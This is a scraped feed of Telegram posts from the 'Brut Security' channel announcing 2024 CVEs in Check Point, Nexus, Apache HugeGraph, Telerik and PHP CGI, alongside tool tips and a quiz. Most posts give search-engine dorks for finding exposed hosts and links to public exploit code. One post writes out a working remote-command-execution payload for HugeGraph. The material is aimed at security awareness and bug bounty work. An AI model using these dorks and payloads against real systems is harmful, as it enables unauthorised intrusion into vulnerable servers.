Brut Security
🚨Check Point Quantum Gateway - CVE-2024-24919🚨 👉CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN…
"Server: Check Point SVN" "X-UA-Compatible: IE=EmulateIE7"
🚨CVE-2024-4956:Nexus Repository Flaw Exposed🚨
⚠️This vulnerability, discovered and responsibly reported by @erickfernandox, could allow attackers to access and download sensitive system files without authentication.
👉Dorks:
Hunter:/product.name="Nexus Repository"
FOFA:app="Nexus-Repository-Manager"
SHODAN:http.html:"Nexus Repository"
POC: https://github.com/vulhub/vulhub/tree/master/nexus/CVE-2024-4956
⚠️This vulnerability, discovered and responsibly reported by @erickfernandox, could allow attackers to access and download sensitive system files without authentication.
👉Dorks:
Hunter:/product.name="Nexus Repository"
FOFA:app="Nexus-Repository-Manager"
SHODAN:http.html:"Nexus Repository"
POC: https://github.com/vulhub/vulhub/tree/master/nexus/CVE-2024-4956
GitHub
vulhub/nexus/CVE-2024-4956 at master · vulhub/vulhub
Pre-Built Vulnerable Environments Based on Docker-Compose - vulhub/vulhub
CVE-2024-27348: Unauthenticated users can execute OS commands via Groovy injection in Apache HugeGraph-Server. Upgrade to version 1.3.0 to mitigate.
💥POC: https://lnkd.in/g_v4h7Cg
👉Dorks:
Hunter: /product.name="Apache HugeGraph"
FOFA: app="HugeGraph-Studio"
SHODAN: http.noscript:"HugeGraph"
💥POC: https://lnkd.in/g_v4h7Cg
👉Dorks:
Hunter: /product.name="Apache HugeGraph"
FOFA: app="HugeGraph-Studio"
SHODAN: http.noscript:"HugeGraph"
🤯8
This media is not supported in your browser
VIEW IN TELEGRAM
📢Use This Extensions, it will help you to Extract all domains From any website.
🔸Link Extractor: https://link-extractor.cssnr.com
🔸Link Gopher: https://github.com/az0/linkgopher
🔸Link Extractor: https://link-extractor.cssnr.com
🔸Link Gopher: https://github.com/az0/linkgopher
👍2🤯2
🚨CVE-2024-27348: RCE in Apache HugeGraph-Server.
📢Remedy: Upgrade to version 1.3.0 to mitigate.
😉Payload:
👌Video: https://youtu.be/32cyeCd4DEc
📢Remedy: Upgrade to version 1.3.0 to mitigate.
😉Payload:
{"gremlin":"def result = \"uname -a\".execute().text\njava.lang.reflect.Field field = Thread.currentThread().getClass().getDeclaredField(\"BrutSecurity\"+ result);"
}
👌Video: https://youtu.be/32cyeCd4DEc
YouTube
CVE-2024-27348 | RCE in Apache HugeGraph-Server | Bug Bounty POC | Brut Security
🚨CVE-2024-27348: RCE in Apache HugeGraph-Server.This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.3.0 in Java8 & Java11 Users are recommended to upgrade to version 1.3.0 with Java11 & enable the Auth system, which fixes the issue.
📢Remedy:…
📢Remedy:…
👍1
🚨Progress Telerik Report Server pre-authenticated RCE chain (CVE-2024-4358/CVE-2024-1800)🚨
📢PoC: https://github.com/sinsinology/CVE-2024-4358
⚠Detailed Analysis from @SinSinology https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/
👉Dorks:
🔸Hunter: /product.name="Telerik report server"
🔸FOFA: app="Telerik-Report-Server"
🔸SHODAN: http.noscript:"Telerik report server"
📢PoC: https://github.com/sinsinology/CVE-2024-4358
⚠Detailed Analysis from @SinSinology https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/
👉Dorks:
🔸Hunter: /product.name="Telerik report server"
🔸FOFA: app="Telerik-Report-Server"
🔸SHODAN: http.noscript:"Telerik report server"
👏2
Hello Members, Hope you're doing well. We have created a WhatsApp Channel for Brut Security. Join now, more cyber security insights coming soon!
You can join here:https://whatsapp.com/channel/0029VacUEmpCnA8014ZLnm1L
You can join here:https://whatsapp.com/channel/0029VacUEmpCnA8014ZLnm1L
WhatsApp.com
Brut Security | WhatsApp Channel
Brut Security WhatsApp Channel. We offer Cyber Security Training, Penetration Testing Services and Bug Bounty Tips to protect businesses and individuals from cyber attacks. Feel Free to DM🛡️. 59 followers
Media is too big
VIEW IN TELEGRAM
🚨Android SSL Pinning Bypass using Noxer🚨
👉Automate your Android penetration testing lab setup using Nox Emulator. Noxer is a powerful Python noscript designed for automating Android penetration testing tasks within the Nox Player emulator. It simplifies setup, enhances stability, manages Frida Server, removes unwanted bloatware, integrates BurpSuite certificates, and much more!
🔗Noxer: https://buff.ly/4b0gxM4
👉Automate your Android penetration testing lab setup using Nox Emulator. Noxer is a powerful Python noscript designed for automating Android penetration testing tasks within the Nox Player emulator. It simplifies setup, enhances stability, manages Frida Server, removes unwanted bloatware, integrates BurpSuite certificates, and much more!
🔗Noxer: https://buff.ly/4b0gxM4
🔥4
This media is not supported in your browser
VIEW IN TELEGRAM
🚨CVE-2024-4577: PHP CGI Argument Injection Vulnerability🚨
⚠Dorks:
🔸Hunter: header.server="PHP"
🔸FOFA: server="PHP"
🔸SHODAN: server: PHP
⚠Dorks:
🔸Hunter: header.server="PHP"
🔸FOFA: server="PHP"
🔸SHODAN: server: PHP
🤯5👍2🔥2
Brut Security
🚨CVE-2024-4577: PHP CGI Argument Injection Vulnerability🚨 ⚠Dorks: 🔸Hunter: header.server="PHP" 🔸FOFA: server="PHP" 🔸SHODAN: server: PHP
GitHub
GitHub - watchtowrlabs/CVE-2024-4577: PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC
PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC - watchtowrlabs/CVE-2024-4577
Which of the following is used for banner grabbing?
Anonymous Quiz
49%
Telnet
12%
FTP
19%
SSH
21%
Wireshark
👍1